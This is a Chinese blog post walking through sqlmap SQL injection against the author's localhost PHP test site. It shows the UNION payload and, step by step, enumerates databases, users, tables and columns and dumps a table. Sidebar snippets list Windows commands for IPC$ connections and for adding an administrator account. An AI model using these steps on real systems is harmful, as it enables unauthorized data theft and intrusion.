黑客渗透如此简单

最新推荐文章于 2024-09-03 16:25:05 发布
最新推荐文章于 2024-09-03 16:25:05 发布
阅读量275 收藏
点赞数
文章标签: php 数据库
原文链接:https://juejin.im/post/5a69cada6fb9a01cac185ee7
版权

sqlmap 小记

sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:18:27

[01:18:27] [INFO] resuming back-end DBMS 'mysql' 
[01:18:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:18:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:18:27] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:18:27

wangleileideMacBook-Air:sqltest wangleilei$ 
复制代码

爆库

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:22:52

[01:22:52] [INFO] resuming back-end DBMS 'mysql' 
[01:22:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:22:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:22:52] [INFO] fetching database names
[01:22:52] [INFO] the SQL query used returns 8 entries
[01:22:52] [INFO] resumed: information_schema
[01:22:52] [INFO] resumed: BYSJ
[01:22:52] [INFO] resumed: YGGL
[01:22:52] [INFO] resumed: ctz
[01:22:52] [INFO] resumed: mysql
[01:22:52] [INFO] resumed: new_schema
[01:22:52] [INFO] resumed: performance_schema
[01:22:52] [INFO] resumed: sys
available databases [8]:                                                       
[*] BYSJ
[*] ctz
[*] information_schema
[*] mysql
[*] new_schema
[*] performance_schema
[*] sys
[*] YGGL

[01:22:52] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:22:52
复制代码
爆出数据库有8个库 好恐怖/?,然后我们看看漏洞文件用的哪个数据库

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:25:15

[01:25:15] [INFO] resuming back-end DBMS 'mysql' 
[01:25:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:25:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:25:16] [INFO] fetching current database
current database:    'ctz'
[01:25:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:25:16

复制代码
很明显看到了currentDataBases 为ctz,然后我们看看当前user

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:28:02

[01:28:02] [INFO] resuming back-end DBMS 'mysql' 
[01:28:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:28:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:28:02] [INFO] fetching database users
[01:28:02] [INFO] the SQL query used returns 29 entries
database management system users [2]:                                          
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'

[01:28:02] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:28:02
复制代码
看到了用户是:root
列出当前数据库所有表

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:40:11

[01:40:11] [INFO] resuming back-end DBMS 'mysql' 
[01:40:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:40:11] [INFO] fetching tables for database: 'ctz'
[01:40:11] [INFO] the SQL query used returns 13 entries
[01:40:11] [INFO] resumed: article
[01:40:11] [INFO] resumed: ys_admin
[01:40:11] [INFO] resumed: ys_cs
[01:40:11] [INFO] resumed: ys_gmjl
[01:40:11] [INFO] resumed: ys_huifu
[01:40:11] [INFO] resumed: ys_rwcs
[01:40:11] [INFO] resumed: ys_rwlb
[01:40:11] [INFO] resumed: ys_txjl
[01:40:11] [INFO] resumed: ys_users
[01:40:11] [INFO] resumed: ys_wxcd
[01:40:11] [INFO] resumed: ys_xtcs
[01:40:11] [INFO] resumed: ys_yjjl
[01:40:11] [INFO] resumed: ys_zjmx
Database: ctz                                                                  
[13 tables]
+----------+
| article  |
| ys_admin |
| ys_cs    |
| ys_gmjl  |
| ys_huifu |
| ys_rwcs  |
| ys_rwlb  |
| ys_txjl  |
| ys_users |
| ys_wxcd  |
| ys_xtcs  |
| ys_yjjl  |
| ys_zjmx  |
+----------+

[01:40:11] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:40:11

复制代码
列出上面查出来的任意一个表的所有列(以ys_rwcs)为例子

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:43:19

[01:43:20] [INFO] resuming back-end DBMS 'mysql' 
[01:43:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:43:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:43:20] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:43:20] [INFO] the SQL query used returns 8 entries
[01:43:20] [INFO] resumed: "id","int(11)"
[01:43:20] [INFO] resumed: "kqzt","int(11)"
[01:43:20] [INFO] resumed: "scyxsj","int(11)"
[01:43:20] [INFO] resumed: "scid","int(11)"
[01:43:20] [INFO] resumed: "sckjjg","varchar(255)"
[01:43:20] [INFO] resumed: "dqid","int(11)"
[01:43:20] [INFO] resumed: "xtcjsj","int(11)"
[01:43:20] [INFO] resumed: "kjdj","int(11)"
Database: ctz                                                                  
Table: ys_rwcs
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| dqid   | int(11)      |
| id     | int(11)      |
| kjdj   | int(11)      |
| kqzt   | int(11)      |
| scid   | int(11)      |
| sckjjg | varchar(255) |
| scyxsj | int(11)      |
| xtcjsj | int(11)      |
+--------+--------------+

[01:43:20] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:43:20

复制代码
爆字段内容

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:48:16

[01:48:16] [INFO] resuming back-end DBMS 'mysql' 
[01:48:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:48:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:48:16] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:48:16] [INFO] the SQL query used returns 8 entries
[01:48:16] [INFO] resumed: "id","int(11)"
[01:48:16] [INFO] resumed: "kqzt","int(11)"
[01:48:16] [INFO] resumed: "scyxsj","int(11)"
[01:48:16] [INFO] resumed: "scid","int(11)"
[01:48:16] [INFO] resumed: "sckjjg","varchar(255)"
[01:48:16] [INFO] resumed: "dqid","int(11)"
[01:48:16] [INFO] resumed: "xtcjsj","int(11)"
[01:48:16] [INFO] resumed: "kjdj","int(11)"
[01:48:16] [INFO] fetching entries for table 'ys_rwcs' in database 'ctz'       
[01:48:16] [WARNING] reflective value(s) found and filtering out
[01:48:16] [INFO] the SQL query used returns 1 entries
[01:48:16] [INFO] retrieved: "5940","1","1","0","5939"," ","1488499312","1487...
[01:48:16] [INFO] analyzing table dump for possible password hashes            
Database: ctz
Table: ys_rwcs
[1 entry]
+----+------+------+------+------+------------+--------+------------+
| id | dqid | scid | kjdj | kqzt | scyxsj     | sckjjg | xtcjsj     |
+----+------+------+------+------+------------+--------+------------+
| 1  | 5940 | 5939 | 1    | 0    | 1488499312 | NULL   | 1487741441 |
+----+------+------+------+------+------------+--------+------------+

[01:48:16] [INFO] table 'ctz.ys_rwcs' dumped to CSV file '/Users/wangleilei/.sqlmap/output/localhost/dump/ctz/ys_rwcs.csv'
[01:48:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:48:16
复制代码
weixin_33881753
关注
如何用java 写简单的网络ddos攻击(黑客
洛阳泰山的博客
11-03 9815
代码如下 import lombok.extern.slf4j.Slf4j; import java.io.BufferedInputStream; import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; @Slf4j publi.
关于《Python黑帽子:黑客渗透测试编程之道》的学习笔记
热门推荐
Mi1k7ea
05-04 2万+
本篇文章是学习《Python黑帽子:黑客渗透测试编程之道》的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python的安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了。 第一章——设置Python环境: Kali Linux的安装就不说了,最近有更新为2017版的可以下载。 确认是否安装了正确的Python版本: 确认是2.7版本的即可。 接着安装P
关于CMD简单黑客指令
efcdgg的博客
08-21 2878
CMD是什么?在windows环境下,命令行程序为cmd.exe。 是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序。 类似于微软的DOS操作系统。输入一些命令,cmd.exe可以执行。 cmd可以方便操作系统,以下指令为CMD的黑客必会指令 net use ipipc$ " " /user:" " 建立IPC空链接 net use ipipc$ “密码” /user:“用户名” 建立IPC非空链接 net use h: ipc$ “密码” /user:“用户名” 直接登
接口自动化测试的"开胃小菜"---简单黑客攻击手段
weixin_33804990的博客
09-16 125
Web应用系统的小安全漏洞及相应的攻击方式 接口自动化测试的"开胃小菜" 1写作目的 本文讲述一个简单的利用WebAPI来进行一次基本没有破坏力的“黑客”行为。 主要目的如下: 了解什么叫安全漏洞 知道什么是api 了解一些获取api的工具 通过对API的认识了解白盒接口测试基本概念和技术 免责声明: 本文主要是以学习交流为目的,而且实验的对象也是通过搜索引擎...
简单装逼代码
最新发布
2401_87099587的博客
09-03 395
今天给大家分享一个装逼代码。
黑客代码
2201_76050918的博客
12-28 1436
学编程就来找我当师傅。因为我是黑客,没有绝对安全的系统
用python写的简易黑客游戏
Dyzze的博客
12-23 1620
原创黑客游戏
渗透测试:XSS漏洞定义及防护
WEL测试
12-22 944
什么是XSS XSS(cross site script)或者说跨站脚本是一种web应用程序的漏洞,恶意攻击者往web页面里插入恶意script代码,当用户浏览该页之时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。 跨站脚本漏洞风险 盗取用户cookie,然后伪造用户身份登录,泄露用户个人身份及用户订单信息。 操控用户浏览器,借助其他漏洞可能会导致对https加密信息的破解,导致登录传输存在安全风险。 结合浏览器及其插件漏洞,下载病毒木马到浏览器的计算机上执行。 修改页面内容
黑客攻击常用软件
2301_77934503的博客
05-21 1207
Wireshark是一款非常受欢迎的五星级工具,一年来,它并没有被列入我们的列表,但是受到人们的需求,我们在2016年6月下旬添加了它.Wireshark实际上是在网络中实时捕获数据包,然后显示数据人性化的格式(详细)。关于Maltego的一个令人敬畏的事情可能使其如此受欢迎(并且包含在Kali Linux十佳)中,其独特的视角在于提供基于网络和资源的实体是整个网络中的信息聚合 - 无论是当前配置在网络中的一个脆弱的路由器或当前的工作人员在国际访问中的下落,马尔戈戈可以找到,聚合和可视化这些数据!
有关流量分析和内存取证的
xiao_xianyu123的博客
01-09 4999
1.流量分析   网络流量分析是指捕捉网络中流动的数据包,并通过查看包内部数据以及进行相关的协议、流量分析、统计等来发现网络运行过程中出现的问题。   CTF比赛中,通常比赛中会提供一个包含流量数据的 PCAP 文件,进行分析。 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:usernam
黑客攻击最短代码大揭秘!不要问,问就是5下shift键!
HUYA69的博客
05-14 2273
我们讲的是攻击过程中用到的代码,不是你攻击过程中准备的软件代码。 我们讲的是现在应当能成功攻击的。不是你已经装好后门你去连接了,像菜刀服务端、跨站代码等。 真正的dir溢出 医科圣手,在某乎上举过例子。在简体中文版 Windows 2000 SP4 的命令提示符下执行这条 dir 命令会导致系统锁屏: dir aux.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
用Python实现黑客代码
ZTLJQ的博客
07-06 3315
用Python实现黑客代码
用c语言写黑客代码
qq_39229627的博客
01-16 2036
当然,真正的黑客行为需要更复杂、高级的技术和知识,此处仅展示了一种简化版的示例。// 如果密码正确则显示访问成功消息。if (inputPassword == password) { // 判断输入的密码与设定的密码是否相等。// 提示用户输入密码。// 接收用户输入的密码。// 存放用户输入的密码。// 在这里可以添加更多的黑客操作或者其他程序逻辑。
黑客命令小集
Gjqhs的博客
12-05 2433
net use $">\\ip\ipc$ " " /user:" " 建立IPC 空链接 net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC 非空链接 net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: $">\\ip\c$ 登陆后映射对方C:到本地为H: net use $">\\ip\ipc$ /del 删除IPC 链接 net use h: /del 删
一秒变成黑客大佬,让妹子对你无法自拔,你只需要学会这个代码
2401_84205765的博客
06-14 1028
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!网络安全产业就像一个江湖,各色人等聚集。
黑客常用命令大全
Mr. David 专栏
03-29 9385
net user heibai lovechina /add        加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add     把他加入Administrator组net start telnet                     开对方的TELNET服务net use z:/127.0.0.1c$  
黑客攻击用的最短代码大揭秘,颠覆你的世界观!
qq_43351159的博客
03-26 5942
我们讲的是攻击过程中用到的代码,不是你攻击过程中准备的软件代码。 我们讲的是现在应当能成功攻击的。不是你已经装好后门你去连接了,像菜刀服务端、跨站代码等。 其实做为一个开发者,有一个学习的氛围跟一个交流圈子特别重要这里我推荐一个C语言C++交流群583650410,不管你是小白还是转行人士欢迎入驻,大家一起交流成长。 真正的dir溢出 医科圣手tombkeeper,在知乎上举过例子。在简体中文版 ...
黑客内网渗透技术解析
在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和控制目标系统的关键途径。下面我们将详细探讨内网渗透中的常见步骤和技巧。 1. **信息刺探**: - **人物身份分析**:了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值